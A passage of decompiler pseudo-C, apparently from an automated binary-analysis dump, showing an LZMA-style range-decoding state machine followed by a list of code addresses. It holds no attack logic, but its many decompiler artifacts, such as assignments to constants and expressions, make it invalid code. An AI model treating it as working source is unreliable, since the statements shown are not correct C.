											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407194
0x00407194
0x00407194
0x00407194
0x0040719a
0x0040719e
0x004071a2
0x004071ac
0x004071ba
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074c7
0x004074cb
0x00000000
0x00000000
0x004074cd
0x004074d6
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074ff
0x00407502
0x00407502
0x00407524
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074cb
0x00000000
0x00000000
0x00000000
0x00407526
0x00407526
0x0040749f
0x004074a3
0x004075db
0x004075db
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x004074a9
0x004074af
0x004074b6
0x004074be
0x004074be
0x004074c1
0x00000000
0x004074c1
0x0040752b
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c03
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
